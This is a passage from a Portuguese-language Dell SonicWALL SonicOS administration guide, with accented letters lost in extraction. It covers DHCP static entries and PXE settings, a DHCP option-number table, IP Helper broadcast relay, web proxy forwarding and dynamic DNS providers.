endereos do gerenciador de chamadas VoIP.
Etapa 16 Em Configuraes de inicializao de rede, no campo Prximo servidor, digite o endereo IP
do servidor de inicializao PXE (servidor TFTP) que um cliente de PXE usa durante o prximo
estgio do processo de inicializao.
Os campos em Configuraes de inicializao de rede so usados em um PXE (Pre-boot
Execution Environment Ambiente de execuo pr-inicializao), no qual o cliente inicializa
usando arquivos obtidos por uma interface de rede. O cliente de PXE obtm o nome e o
endereo IP do servidor de inicializao PXE e o nome do arquivo de inicializao do servidor
DHCP.
Ao usar essas opes, selecione PXE em Opes genricas do DHCP.
Etapa 17 No campo Arquivo de inicializao, digite o nome do arquivo de inicializao que o cliente
de PXE pode obter por TFTP a partir do servidor de inicializao PXE.
Etapa 18 No campo Nome do servidor, digite o nome do host DNS do servidor de inicializao PXE
(servidor TFTP).
Etapa 19 Para obter informaes sobre a configurao das opes genricas do DHCP, consulte
Configurar opes genricas do DHCP para escopos de concesso de DHCP na pgina 373.
Etapa 21 Clique em Aceitar para que as configuraes tenham efeito no firewall.
Para obter mais informaes sobre os recursos de suporte de VoIP no dispositivo de
segurana Dell SonicWALL, consulte Viso geral de VoIP na pgina 773.

Configurar entradas de DHCP estticas
As entradas estticas so endereos IP atribudos a servidores que precisam de configuraes
de IP permanentes. Como o SonicOS permite vrios escopos DHCP por interface, no h
nenhum requisito para que o intervalo de sub-rede esteja anexado interface ao configurar
escopos DHCP.
Para configurar entradas estticas, siga estas etapas:
Etapa 1 Na pgina Rede > Servidor DHCP, na parte inferior da tabela Escopos de concesso de
servidor DHCP, clique em Adicionar esttico. A janela Configurao de entrada esttica
exibida.
Configuraes gerais
Etapa 2 Na guia Geral, verifique se a opo Habilitar este escopo DHCP est marcada se desejar
habilitar essa entrada.
Etapa 3 Insira um nome para a entrada DNS esttica no campo Nome da entrada.
Etapa 4 Digite o endereo IP do dispositivo no campo Endereo IP esttico.
Etapa 5 Digite o endereo de Ethernet (MAC) do dispositivo no campo Endereo Ethernet.
Etapa 6 Digite o nmero de minutos que um endereo IP usado antes de ser emitido outro endereo
IP no campo Tempo de concesso (minutos). 1440 minutos (24 horas) o valor padro.
Etapa 7 Para preencher os campos Gateway padro e Mscara de sub-rede com valores padro para
uma determinada interface, marque a caixa de seleo Preenchimento prvio da interface
prxima parte inferior da pgina e escolha a interface na lista suspensa. Os endereos IP
preenchidos esto na mesma sub-rede privada da interface selecionada.

Nota Para selecionar uma interface no menu Interface, ela deve primeiro ser totalmente
configurada e deve ser do tipo de zona LAN, WLAN ou DMZ ou ser uma subinterface de
VLAN.
Etapa 8 Use o endereo de gateway preenchido ou digite o endereo IP do gateway no campo

Gateway padro.
Etapa 9 Use a mscara de sub-rede preenchida ou digite a mscara de sub-rede do gateway no campo
Mscara de sub-rede.
Configuraes de DNS/WINS
Etapa 10 Clique na guia DNS/WINS para continuar a configurar o recurso Servidor DHCP.
Etapa 11 Se voc tiver um nome de domnio para o servidor DNS, digite-o no campo Nome de domnio.
Etapa 12 Herdar configuraes de DNS dinamicamente das configuraes de DNS do firewall est
selecionada por padro. Quando selecionada, os campos IP do servidor DNS no esto
disponveis.
Etapa 13 Se voc no desejar usar configuraes de rede do firewall, selecione Especificar
manualmente e digite o endereo IP de seu servidor DNS no campo Servidor DNS 1. Voc
pode especificar dois servidores DNS adicionais.
Etapa 14 Se voc tiver o WINS executando na sua rede, digite o(s) endereo(s) IP do servidor WINS no
campo Servidor WINS 1. Voc pode especificar um servidor WINS adicional.

Etapa 15 Clique na guia Avanado. A guia Avanado permite que voc configure o servidor DHCP para
enviar informaes do Gerenciador de chamadas da Cisco para clientes de VoIP na rede.
Etapa 16 Digite o endereo IP ou FQDN de seu Gerenciador de chamadas VoIP no campo Gerenciador
de chamadas 1. Voc pode adicionar mais dois endereos do gerenciador de chamadas VoIP.
Etapa 17 Em Configuraes de inicializao de rede, no campo Prximo servidor, digite o endereo IP
do servidor de inicializao PXE (servidor TFTP) que um cliente de PXE usa durante o prximo
estgio do processo de inicializao.
Os campos em Configuraes de inicializao de rede so usados em um PXE (Pre-boot
Execution Environment Ambiente de execuo pr-inicializao), no qual o cliente inicializa
usando arquivos obtidos por uma interface de rede. O cliente de PXE obtm o nome e o
endereo IP do servidor de inicializao PXE e o nome do arquivo de inicializao do servidor
DHCP.
Ao usar essas opes, selecione PXE em Opes genricas do DHCP.
Etapa 18 No campo Arquivo de inicializao, digite o nome do arquivo de inicializao que o cliente
de PXE pode obter por TFTP a partir do servidor de inicializao PXE.
Etapa 19 No campo Nome do servidor, digite o nome do host DNS do servidor de inicializao PXE
(servidor TFTP).
Etapa 20 Para obter informaes sobre a configurao das opes genricas do DHCP, consulte
Configurar opes genricas do DHCP para escopos de concesso de DHCP na pgina 373.
Etapa 21 Clique em OK para adicionar as configuraes ao firewall.
Etapa 22 Clique em Aceitar para que as configuraes tenham efeito no firewall.
Para obter mais informaes sobre os recursos de suporte de VoIP no dispositivo de
segurana Dell SonicWALL, consulte Viso geral de VoIP na pgina 773.

Configurar opes genricas do DHCP para escopos de concesso
de DHCP
Esta seo fornece tarefas de configurao de opes genricas do DHCP para escopos de
concesso.
Nota Antes de ser possvel configurar opes genricas para um escopo de concesso de DHCP,
deve ser criado um escopo de concesso de servidor DHCP esttico ou dinmico.
A seo Nmeros de opes do DHCP na pgina 374 fornece uma lista de opes DHCP pelo
nmero de opo atribudo por RFC.
Para configurar opes genricas do DHCP para escopos de concesso de servidor DHCP,
execute as seguintes tarefas:
Etapa 1 Se modificar um escopo de concesso de DHCP existente, localize o escopo de concesso em

Escopos de concesso de servidor DHCP na pgina Rede > Servidor DHCP, clique no cone
Configurar e, em seguida, clique na guia Avanado. Se criar um novo escopo de concesso
de DHCP, clique na guia Avanado.
Etapa 2 Selecione uma opo ou um grupo de opes de DHCP no menu suspenso Grupo de opes
genricas de DHCP.
Quando os campos de configuraes de inicializao de rede forem configurados para usar
com PXE, selecione PXE aqui.
Etapa 3 Para sempre usar opes de DHCP para este escopo de concesso de servidor DHCP, marque
a caixa ao lado de Enviar opes genricas sempre.

Nmeros de opes do DHCP
Esta seo fornece uma lista de nmeros de opes do DHCP definidos pelo RFC e
descries:
Nmero
de opo Nome Descrio
2 Diferena de horrio Diferena de horrio em segundos de UTC
3 Roteador Endereos de roteador N/4
4 Servidores de horrio Endereos do servidor de horrio N/4
5 Servidores de nome Endereos de servidor N/4 IEN-116
6 Servidores DNS Endereos de servidor de DNS N/4
7 Servidores de log Endereos de servidor de log N/4
8 Servidores de cookies Endereos de servidor de cotao N/4
9 Servidores LPR Endereos de servidor de impressora N/4
10 Servidores de impresso Endereos de servidor de impresso N/4
11 Servidores RLP Endereos de servidor RLP N/4
12 Nome do host Cadeia de caracteres do nome do host
13 Tamanho do arquivo de Tamanho do arquivo de inicializao em blocos de 512
inicializao bytes
14 Arquivo de imagem do Cliente a despejar e nome do arquivo para o qual despejar
ncleo
15 Nome de domnio O nome de domnio DNS do cliente
16 Servidor de permuta Endereos do servidor de permuta
17 Caminho da raiz Nome do caminho para o disco raiz
18 Arquivo de extenso Nome do patch para obter mais informaes sobre
BOOTP
19 Encaminhamento da Habilitar ou desabilitar o encaminhamento de IP
camada IP
20 Ativador de rota de origem Habilitar ou desabilitar o roteamento de origem
21 Filtro de poltica Roteamento de filtros de poltica
22 Tamanho mximo de Tamanho mximo de reagrupamento de datagrama
reagrupamento de DG
23 TTL de IP padro Vida til de IP padro
24 Tempo limite de durao da Tempo limite de durao da MTU do caminho
MTU do caminho
25 Limite da MTU Tabela de limite da MTU do caminho
26 Tamanho de MTU de Tamanho de MTU de interface
interface
27 Todas as sub-redes so Todas as sub-redes so locais
locais
28 Endereo de difuso Endereo de difuso

Nmero
de opo Nome Descrio
29 Executar descoberta de Executar descoberta de mscara
mscara
30 Fornecer mscara a outros Fornecer mscara a outros
31 Executar descoberta de Executar descoberta de roteador
roteador
32 Endereo de solicitao de Endereo de solicitao de roteador
roteador
33 Tabela de roteamento Tabela de roteamento esttico
esttico
34 Encapsulamento de Encapsulamento de informaes finais
informaes finais
35 Tempo limite de cache de Tempo limite de cache de ARP
ARP
36 Encapsulamento de Encapsulamento de Ethernet
Ethernet
37 Vida til do TCP padro Vida til do TCP padro
38 Intervalo de manuteno de Intervalo de manuteno de atividade do TCP
atividade do TCP
39 Lixo de manuteno de Lixo de manuteno de atividade do TCP
atividade do TCP
40 Nome de domnio NIS Nome de domnio NIS
41 Endereos do servidor NIS Endereos do servidor NIS
42 Endereos de servidores Endereos de servidores NTP
NTP
43 Informaes especficas do Informaes especficas do fornecedor
fornecedor
44 Servidor de nome NetBIOS Servidor de nome NetBIOS
45 Distribuio de datagramas Distribuio de datagramas NetBIOS
NetBIOS
46 Tipo de n NETBIOS Tipo de n NetBIOS
47 Escopo de NetBIOS Escopo de NetBIOS
48 Servidor de fonte X Window Servidor de fonte X Window
49 Gerenciador de exibies X Gerenciador de exibies X Window
Window
50 Endereo IP solicitado Endereo IP solicitado
51 Tempo de concesso de Tempo de concesso de endereo IP
endereo IP
52 Sobrecarga de opo "Arquivo" ou "sname" de sobrecarga
53 Tipo de mensagem DHCP Tipo de mensagem DHCP
54 Identificao do servidor Identificao do servidor DHCP
DHCP

Nmero
de opo Nome Descrio
55 Lista de solicitaes de Lista de solicitaes de parmetros
parmetros
56 Mensagem Mensagem de erro do DHCP
57 Tamanho mximo de Tamanho mximo de mensagem DHCP
mensagem DHCP
58 Renovar valor de tempo Tempo (T1) de renovao do DHCP
59 Religar valor de tempo Tempo (T2) de religao do DHCP
60 Identificador de cliente Identificador de cliente
61 Identificador de cliente Identificador de cliente
62 Nome de domnio IP/ Nome de domnio IP/Netware
Netware
63 Opes sub de IP/Netware Opes sub de IP/Netware
64 Nome de domnio de cliente Nome de domnio de cliente NIS+ V3
NIS+ V3
65 Endereo do servidor NIS+ Endereo do servidor NIS+ V3
V3
66 Nome do servidor TFTP Nome do servidor TFTP
67 Nome do arquivo de Nome do arquivo de inicializao
inicializao
68 Endereos de agente local Endereos de agente local
69 Endereos de servidor Endereos de servidor Simple Mail
Simple Mail
70 Endereos de servidor Post Endereos de servidor Post Office
Office
71 Endereos de servidor Endereos de servidor Network News
Network News
72 Endereos de servidor Endereos de servidor WWW
WWW
73 Endereos de servidor Endereos de servidor Finger
Finger
74 Endereos de servidor Chat Endereos de servidor Chat
75 Endereos de servidor Endereos de servidor StreetTalk
StreetTalk
76 Endereos de assistncia Endereos de assistncia de diretrio StreetTalk
de diretrio StreetTalk
77 Informaes de classe de Informaes de classe de usurio
usurio
78 Agente de diretrio SLP Informaes de agente do diretrio
79 Escopo de servio SLP Escopo de agente de local do servio
80 Confirmao rpida Confirmao rpida
81 FQDN, Nome de domnio Nome de domnio totalmente qualificado
totalmente qualificado

Nmero
de opo Nome Descrio
82 Informaes do agente de Informaes do agente de retransmisso
retransmisso
83 Servio iSNS Servio iSNS
84 Indefinido N/D
85 Servidores de diretrio Servidores de servios de diretrio Novell
Novell
86 Nome da rvore de Nome da rvore de servidores de servios de diretrio
servidores de diretrio Novell
Novell
87 Contexto de servidor de Contexto de servidor de servios de diretrio Novell
diretrio Novell
88 Lista de nomes de domnio Lista de nomes de domnio de controlador CMCS
de controlador BCMCS
89 Lista de endereos IPv4 de Lista de endereos IPv4 de controlador BCMCS
controlador BCMCS
90 Autenticao Autenticao
91 Indefinido N/D
92 Indefinido N/D
93 Sistema de cliente Arquitetura do sistema de cliente
94 Interface de dispositivo de Interface de dispositivo de rede cliente
rede cliente
95 Uso de LDAP Protocolo LDAP
96 Indefinido N/D
97 Identificador de cliente Identificador de cliente baseado em UUID/GUID
baseado em UUID/GUID
98 Autenticao do usurio do Autenticao do usurio do grupo aberto
grupo aberto
99 Indefinido N/D
100 Indefinido N/D
101 Indefinido N/D
102 Indefinido N/D
103 Indefinido N/D
104 Indefinido N/D
105 Indefinido N/D
106 Indefinido N/D
107 Indefinido N/D
108 Indefinido N/D
109 Nmero de sistema Nmero de sistema autnomo
autnomo
110 Indefinido
111 Indefinido

Nmero
de opo Nome Descrio
112 Endereo de servidor pai Endereo de servidor pai NetInfo
NetInfo
113 Marca de servidor pai Marca de servidor pai NetInfo
NetInfo
114 URL: URL
115 Indefinido N/D
116 Configurao automtica Configurao automtica do DHCP
117 Pesquisa de servio de Pesquisa de servio de nomes
nomes
118 Coleo de sub-rede Seleo de sub-rede
119 Lista de pesquisa de Lista de pesquisa de domnios DNS
domnios DNS
120 Opo do DHCP de Opo do DHCP de servidores SIP
servidores SIP
121 Opo de rota esttica sem Opo de rota esttica sem classe
classe
122 CCC, Configurao de Configurao de cliente CableLabs
cliente CableLabs
123 GeoConf GeoConf
124 Classe de fornecedor de Classe de fornecedor de identificao do mesmo
identificao do mesmo
125 Especfico de fornecedor de Especfico de fornecedor de identificao do mesmo
identificao do mesmo
126 Indefinido N/D
127 Indefinido N/D
128 Endereo IP de servidor Endereo IP de servidor TFTP para carregamento de
TFTP software de telefone IP
129 Endereo IP de servidor de Endereo IP de servidor de chamadas
chamadas
130 Cadeia de caracteres de Cadeia de caracteres de discriminao para identificar
discriminao fornecedor
131 Endereo IP de servidor de Endereo IP de servidor de estatsticas remoto
estatsticas remoto
132 ID DE VLAN 802.1Q ID DE VLAN 802.1Q IEEE
133 Prioridade de L2 802.1Q Prioridade de camada 2 802.1Q IEEE
134 Ponto de cdigo Diffserv Ponto de cdigo DiffServ para fluxos de mdia e
sinalizao de VoIP
135 Proxy HTTP para Proxy HTTP para aplicativos especficos de telefone
aplicativos de telefone
136 Indefinido N/D
137 Indefinido N/D
138 Indefinido N/D

Nmero
de opo Nome Descrio
139 Indefinido N/D
140 Indefinido N/D
141 Indefinido N/D
142 Indefinido N/D
143 Indefinido N/D
144 Indefinido N/D
145 Indefinido N/D
146 Indefinido N/D
147 Indefinido N/D
148 Indefinido N/D
149 Indefinido N/D
150 Endereo do servidor TFTP, Endereo do servidor TFTP, Etherboot, Configurao
Etherboot, Config. GRUB GRUB
151 Indefinido
152 Indefinido N/D
153 Indefinido N/D
154 Indefinido N/D
155 Indefinido N/D
156 Indefinido N/D
157 Indefinido N/D
158 Indefinido N/D
159 Indefinido N/D
160 Indefinido N/D
161 Indefinido N/D
162 Indefinido N/D
163 Indefinido N/D
164 Indefinido N/D
165 Indefinido N/D
166 Indefinido N/D
167 Indefinido N/D
168 Indefinido N/D
169 Indefinido N/D
170 Indefinido N/D
171 Indefinido N/D
172 Indefinido N/D
173 Indefinido N/D
174 Indefinido N/D

Nmero
de opo Nome Descrio
175 Ether Boot Ether Boot
176 Telefone IP Telefone IP
177 Ether Boot, PacketCable e Ether Boot, PacketCable e CableHome
CableHome
178 Indefinido N/D
179 Indefinido N/D
180 Indefinido N/D
181 Indefinido N/D
182 Indefinido N/D
183 Indefinido N/D
184 Indefinido N/D
185 Indefinido N/D
186 Indefinido N/D
187 Indefinido N/D
188 Indefinido N/D
189 Indefinido N/D
190 Indefinido N/D
191 Indefinido N/D
192 Indefinido N/D
193 Indefinido N/D
194 Indefinido N/D
195 Indefinido N/D
196 Indefinido N/D
197 Indefinido N/D
198 Indefinido N/D
199 Indefinido N/D
200 Indefinido N/D
201 Indefinido N/D
202 Indefinido N/D
203 Indefinido N/D
204 Indefinido N/D
205 Indefinido N/D
206 Indefinido N/D
207 Indefinido N/D
208 pxelinux.magic (cadeia de pxelinux.magic (cadeia de caracteres) = 241.0.116.126
caracteres) = 241.0.116.126
209 pxelinux.configfile (texto) pxelinux.configfile (texto)
210 pxelinux.pathprefix (texto) pxelinux.pathprefix (texto)

Nmero
de opo Nome Descrio
211 pxelinux.reboottime pxelinux.reboottime
212 Indefinido N/D
213 Indefinido N/D
214 Indefinido N/D
215 Indefinido N/D
216 Indefinido N/D
217 Indefinido N/D
218 Indefinido N/D
219 Indefinido N/D
220 Alocao de sub-rede Alocao de sub-rede
221 Alocao de sub-rede Seleo de sub-rede virtual
virtual
222 Indefinido N/D
223 Indefinido N/D
224 Uso privado Uso privado

Nmero
de opo Nome Descrio
DHCP e IPv6
O servidor do DHCPv6 pode ser configurado de forma semelhante ao IPv4, depois

de selecionar a opo IPv6 no boto de seleo Exibir verso de IP localizado na parte
superior esquerda da pgina Rede > DNS.

Captulo 25
Usar Auxiliar de IP
Rede > Auxiliar de IP

Muitos protocolos de datagrama de usurio (UDP) dependem de difuso/difuso seletiva para
localizar o respectivo servidor, geralmente exigindo que seus servidores estejam presentes na
mesma sub-rede de difuso. Para suportar casos em que os servidores esto em sub-redes
diferentes das dos clientes, necessrio um mecanismo para encaminhar essas difuses/
difuses seletivas de UDP para essas sub-redes. Esse mecanismo designado como
encaminhamento de difuso de UDP. O Auxiliar de IP ajuda na difuso/difuso seletiva de
pacotes para passarem uma interface de firewall e serem encaminhados para outras interfaces
com base em polticas.

Definir configuraes do auxiliar de IP na pgina 384
Configurar protocolos de retransmisso na pgina 384
Configurar polticas do auxiliar de IP na pgina 385
Usar Auxiliar de IP | 383

Definir configuraes do auxiliar de IP
O Auxiliar de IP permite que o dispositivo de segurana Dell SonicWALL encaminhe
solicitaes de DHCP com origem em suas interfaces para um servidor DHCP centralizado.
Ative os recursos do Auxiliar de IP marcando a caixa de seleo Habilitar o auxiliar de IP.
Configurar protocolos de retransmisso

O Auxiliar de IP suporta protocolos definidos pelo usurio e polticas alargadas. O Auxiliar de
IP fornece melhor controle sobre aplicativos de retransmisso de DHCP/NetBIOS existentes.
Alguns dos aplicativos incorporados que foram alargados incluem:
DHCP nmero da porta de UDP 67/68
NET-Bios NS nmero da porta de UDP 137
Datagrama de NET-Bios nmero da porta de UDP 138
DNS nmero da porta de UDP 53
Hora de servio nmero da porta de UDP 37
Wake On LAN (WOL)
mDNS nmero da porta de UDP 5353; endereo de difuso seletiva 224.0.0.251
Cada protocolo possui as seguintes opes configurveis:
Nome o nome dos protocolos. Observe que estes diferenciam maisculas de minsculas
e devem ser exclusivos.
Porta 1/2 o nmero da porta de UDP exclusivo.
Converter IP converso do IP de origem ao encaminhar um pacote.
Tempo limite tempo limite de cache do Auxiliar de IP em segundos em um incremento
de 10.
Modo bruto encaminhamento unidirecional que no cria um cache de Auxiliar de IP. Isso
adequado para a maioria dos protocolos definidos pelo usurio que so usados para
deteco, por exemplo, WOL/mDNS.
Adicionar protocolos de retransmisso definidos pelo usurio

Clique no boto Adicionar no canto inferior esquerdo da tabela de lista de protocolos. Os
campos a seguir devem ser configurados para adicionar um protocolo.

Habilitar aplicativo habilite o aplicativo do Auxiliar de IP. Se estiver desabilitado, o cache
do Auxiliar de IP ser excludo.
Nome crie um nome exclusivo que diferencia maisculas de minsculas.
Porta 1/2 os nmeros da porta de UDP exclusivos.
Tempo limite opcional. O tempo limite de cache do Auxiliar de IP em segundos em um
incremento de 10. Se no for especificado, selecionado um valor padro de 30 segundos.
Converso de IP quando est selecionado, o firewall converte o IP de origem do pacote
encaminhado.
Modo bruto quando est selecionado, o Auxiliar de IP no cria um cache; o
encaminhamento unidirecional suportado.
Excluir protocolos definidos pelo usurio

possvel excluir um protocolo definido pelo usurio selecionando o boto Excluir prximo
desse protocolo. O usurio tambm pode marcar a caixa de seleo mais esquerda do
protocolo desejado e, em seguida, clicar no boto Excluir localizado no canto inferior esquerdo
da tabela.
Recuperar contadores
Ao posicionar o cursor sobre uma imagem de "Estatsticas" de uma poltica ou de um protocolo,
o contador aparecer exibindo as estatsticas de trfego desse protocolo.
Configurar polticas do auxiliar de IP

As Polticas do Auxiliar de IP permitem que voc encaminhe difuses de DHCP e NetBIOS
de uma interface para outra interface.
Nota O Auxiliar de IP no suportado para interfaces de WAN ou para interfaces que esto
configuradas para NAT.

Adicionar uma poltica de auxiliar de IP para DHCP
Etapa 1 Clique no boto Adicionar na tabela Polticas de auxiliar de IP. A janela Adicionar poltica
do auxiliar de IP exibida.
Etapa 2 Esta poltica est habilitada por padro. Para configurar a poltica sem habilit-la, desmarque
a caixa de seleo Habilitada.
Etapa 3 Selecione DHCP no menu Protocolo.
Etapa 4 Selecione uma zona ou interface de origem no menu De.
Etapa 5 Selecione um Grupo de endereos ou Objeto de endereo de destino no menu Para ou
selecione Criar uma nova rede para criar um novo Objeto de endereo.
Etapa 6 Introduza um comentrio adicional no campo Comentrio.
Etapa 7 Clique em OK para adicionar a poltica tabela Polticas de Auxiliar de IP.
Adicionar uma poltica de auxiliar de IP para NetBIOS
Etapa 1 Clique no boto Adicionar na tabela Polticas de auxiliar de IP. A janela Adicionar poltica
do auxiliar de IP exibida.
Etapa 2 Esta poltica est habilitada por padro. Para configurar a poltica sem habilit-la, desmarque
a caixa de seleo Habilitada.
Etapa 3 Selecione NetBIOS no menu Protocolo.
Etapa 4 Selecione um Grupo de endereos ou um Objeto de endereo de origem no menu De.
Selecione Criar uma nova rede para criar um novo Objeto de endereo.
Etapa 5 Selecione um Grupo de endereos ou Objeto de endereo de destino no menu Para ou
selecione Criar uma nova rede para criar um novo Objeto de endereo.
Etapa 6 Introduza um comentrio adicional no campo Comentrio.
Etapa 7 Clique em OK para adicionar a poltica tabela Polticas de Auxiliar de IP.
Editar uma poltica do auxiliar de IP
Clique no cone Editar na coluna Configurar da tabela Polticas do Auxiliar de IP para

exibir a janela Editar Auxiliar de IP que inclui as mesmas configuraes da janela Adicionar
poltica do auxiliar de IP.
Excluir polticas do auxiliar de IP

Clique no cone Excluir para excluir a entrada de poltica de Auxiliar de IP individual. Clique
no boto Excluir para excluir todas as polticas de Auxiliar de IP selecionadas na tabela
Polticas do Auxiliar de IP.
Exibir o cache do Auxiliar de IP de TSR

O TSR mostrar todos os caches do Auxiliar de IP, as polticas atuais e os protocolos:
#IP_HELPER_START
Auxiliar de IP

-----Dados globais de tempo de execuo do Auxiliar de IP-----
O Auxiliar de IP est DESLIGADO
Auxiliar de IP a retransmisso de DHCP est DESLIGADA
Auxiliar de IP a retransmisso de Netbios est DESLIGADA
Nmero total de pacotes encaminhados: 0
Nmero total de pacotes descartados: 0
Nmero total de pacotes aprovados: 0
Nmero total de pacotes desconhecidos: 0
Nmero total de falhas ao criar registro: 0
Nmero total de falhas ao criar elemento: 0 Definido pelo usurio
-----Aplicativos do Auxiliar de IP-----
Nome: DHCP
Porta: 67, 68, Registro mx.: 4000, Status: DESLIGADO
Pode ser excl.: NO, Alterar IP: 1, Bruto: NO
Elemento mx.: 8000, Tempo limite: 3, ndice: 1, protocolo: 1,
Contagem de registros: 0, Contagem de elementos: 0,
Encaminhado: 0, Descartado: 0, Aprovado: 0
Nome: NetBIOS
Nome: DNS
Nome: HORA
Nome: WOL
Pode ser excl.: NO, Alterar IP: 1, Bruto: SIM

Nome: mDNS
Pode ser excl.: NO, Alterar IP: 1, Bruto: SIM
----------Poltica de retransmisso de APP GEN-----------
----------------------------------Tabela de registros----------------------------
Record(hash)[ClientIP, ClientIf, ClientMac, Proto, Vpn, transId, Age(pkts)]
Elmnt(hash)[serverIp, serverIf, srcIp, dhcpMac, transId, Vpn, proto(fm,to)]
---------------------------------------------------------------------------
----------Poltica de retransmisso de DHCP-----------
--------Poltica de retransmisso de NETBIOS-----------#IP_HELPER_END

Captulo 26
Configurar encaminhamento de proxy da
Web
Rede > Proxy da Web

Quando usurios acessam a Web atravs de um servidor proxy localizado na rede interna
(entre o usurio e o dispositivo UTM), as conexes HTTP/HTTPS visualizadas pelo dispositivo
tm origem no servidor proxy e no no usurio.
Um servidor proxy da Web intercepta solicitaes de HTTP e determina se ele armazenou

cpias das pginas da Web solicitadas. Se no tiver armazenado, o proxy conclui a solicitao
ao servidor na Internet, retornando as informaes solicitadas para o usurio e tambm
salvando-as localmente para solicitaes futuras. A configurao de um servidor proxy da Web
em uma rede pode ser complicada, pois cada computador na rede deve estar configurado para
direcionar solicitaes da Web para o servidor.
Se voc tiver um servidor proxy em sua rede, em vez de configurar o navegador da Web de
cada computador para apontar para o servidor proxy, voc pode mover o servidor para a WAN
ou DMZ e habilitar o encaminhamento de proxy da Web usando as configuraes na pgina
Rede > Proxy da Web. O firewall encaminha automaticamente todas as solicitaes de proxy
da Web para o servidor proxy sem a necessidade de configurao de todos os computadores
na rede.
Configurar encaminhamento de proxy da Web | 389

O grfico a seguir mostra a pgina Rede > Proxy da Web.
Configurar o encaminhamento de proxy automtico (somente Web)

Para configurar o encaminhamento de proxy automtico (somente Web):
Etapa 1 Conecte o servidor proxy da Web a um hub e, em seguida, conecte o hub porta de DMZ ou
WAN do firewall.
Nota O servidor proxy deve estar localizado na WAN ou DMZ; ele no pode estar localizado na
LAN.
Etapa 2 V para Rede > Proxy da Web.

Etapa 3 Em Encaminhamento de proxy automtico (somente Web), digite o nome ou endereo IP
do servidor proxy no campo Servidor proxy Web (nome ou endereo IP).
Etapa 4 Digite a porta IP do proxy no campo Porta de servidor Web proxy.
Etapa 5 Para ignorar os servidores proxy se ocorrer uma falha, marque a caixa de seleo Ignorar
servidores proxy em caso de falha de servidor proxy.
Nota A caixa de seleo Ignorar servidores proxy em caso de falha de servidor proxy
permite que os clientes atrs do firewall ignorem o servidor proxy da Web no caso
de se tornar indisponvel. Em vez disso, o navegador do cliente acessa a Internet
diretamente como se um servidor proxy da Web no estivesse especificado.
Etapa 6 Selecione Encaminhar solicitaes de cliente DMZ para servidor proxy se voc tiver
clientes configurados na DMZ.
Depois que o firewall tenha sido atualizado, exibida uma mensagem confirmando a
atualizao na parte inferior da janela do navegador.

Configurar servidores proxy de usurio
Os usurios podem configurar uma lista de at 32 servidores proxy de usurio digitando o
nome do host ou endereo IP.
Para configurar um servidor proxy de usurio:
Etapa 1 Conecte o servidor proxy de usurio a um hub e conecte o hub porta WAN ou DMZ do firewall.
Nota O servidor proxy deve estar localizado na WAN ou DMZ; ele no pode estar localizado na
LAN.
Etapa 2 V para Rede > Proxy da Web.

Etapa 3 Em Servidores proxy de usurio, clique no boto Adicionar.
Etapa 4 Digite o nome ou endereo IP do servidor proxy.

Etapa 6 Repita as etapas 3 e 4 para adicionar mais servidores proxy.
Editar servidores proxy de usurio

Para editar o nome ou endereo IP de um servidor proxy:
Etapa 1 Na caixa de listagem do servidor proxy, selecione o servidor proxy que voc deseja editar.
Etapa 2 Clique no boto Editar.
Etapa 3 Digite o nome ou endereo IP do servidor proxy.
Remover servidores proxy de usurio

Para remover um servidor proxy:
Etapa 1 Na caixa de listagem de servidor proxy, selecione o servidor proxy que deseja remover.
Etapa 2 Clique no boto Remover.
Configurar encaminhamento de proxy da Web | 391

Captulo 27
Configurar o DNS dinmico
Rede > DNS dinmico

DNS dinmico (DDNS) um servio fornecido por vrias empresas e organizaes que
permite alteraes dinmicas em endereos IP para atualizar automaticamente registros de
DNS sem uma interveno manual. Este servio permite acesso rede usando nomes de
domnio em vez de endereos IP, mesmo quando os endereos IP de destino mudam. Por
exemplo, se um usurio tiver uma conexo DSL com um endereo IP atribudo dinamicamente
do ISP, o usurio pode usar o DDNS para registrar o endereo IP, mudando qualquer endereo
subsequente, com um provedor de servios DDNS para que os hosts externos possam
alcan-lo usando um nome de domnio inalterado.
As implementaes de DNS dinmico mudam de um provedor de servios para outro. No h
nenhum padro estrito para o mtodo de comunicao, para os tipos de registros que podem
ser registrados ou para os tipos de servios que podem ser oferecidos. Alguns provedores
oferecem tambm verses premium dos seus servios mediante o pagamento de uma taxa.
Como tal, o suporte de um determinado provedor DDNS requer explcita interoperabilidade
com implementao especfica desse provedor.
A maioria dos provedores prefere essencialmente que registros de DDNS somente possam ser
atualizados quando ocorrem alteraes de endereo IP. Atualizaes frequentes,
especialmente quando o endereo IP registrado no alterado, podem ser consideradas
abuso por provedores e podem resultar no bloqueio de sua conta DDNS. Consulte as polticas
de uso publicadas nas pginas do provedor e cumpra as diretrizes. A SonicWALL no oferece
suporte tcnico a provedores de DDNS. Os prprios provedores devem ser contatados.
Configurar o DNS dinmico | 393

Provedores de DDNS suportados
Nem todos os servios e recursos de todos os provedores so suportados e a lista de
provedores suportados est sujeita a alteraes. O SonicOS suporta atualmente os seguintes
servios de quatro provedores de DNS dinmico:
Dyndns.org o SonicOS requer um nome de usurio, uma senha, um servidor de
mensagens e um servidor de mensagens de backup para configurar o DDNS de
Dyndns.org.
Changeip.com um servio de DNS dinmico tradicional e nico que requer somente
nome de usurio, senha e nome de domnio para a configurao do SonicOS.
No-ip.com um servio de DNS dinmico que requer somente nome de usurio, senha e
nome de domnio para a configurao do SonicOS. Tambm suporta agrupamento de
nome de host.
Yi.org servio de DNS dinmico que requer somente nome de usurio, senha e nome de
domnio para a configurao do SonicOS. Requer que um registro de RR seja criado na
pgina administrativa de yi.org para que as atualizaes dinmicas ocorram corretamente.
Servios adicionais oferecidos por provedores de DNS dinmico

Alguns servios adicionais comuns oferecidos por provedores de DNS dinmico incluem:
Caracteres curinga permite referncias de caractere curinga para subdomnios. Por
exemplo, se voc registrar yourdomain.dyndns.org, seu site estaria acessvel em
*.yourdomain.dyndyn.org, por exemplo, server.yourdomain.dyndyn.org,
www.yourdomain.dyndyn.org, ftp.yourdomain.dyndyn.org, etc.
Servidor de mensagens cria entradas de registro do servidor de mensagens para seu
domnio para que os servidores SMTP possam localiz-lo atravs de DNS e enviar e-mail.
Nota: o SMTP de entrada frequentemente bloqueado por ISPs. Entre em contato com seu
provedor antes de tentar hospedar um servidor de e-mail.
Servidor de mensagens de backup (oferecido por dyndns.org, yi.org) permite
especificar um endereo IP alternativo para o registro do servidor de mensagens no caso
de o endereo IP primrio estar inativo.
Grupos permite agrupar hosts para que uma atualizao possa ser executada uma vez
no nvel de grupo, em vez de vrias vezes para cada membro.
Endereo IP offline permite a especificao de um endereo alternativo para seus
nomes de host registrados no caso de o IP primrio registrado estar offline.
Configurar o DNS dinmico

O uso de qualquer servio de DNS dinmico comea com as configuraes de uma conta com
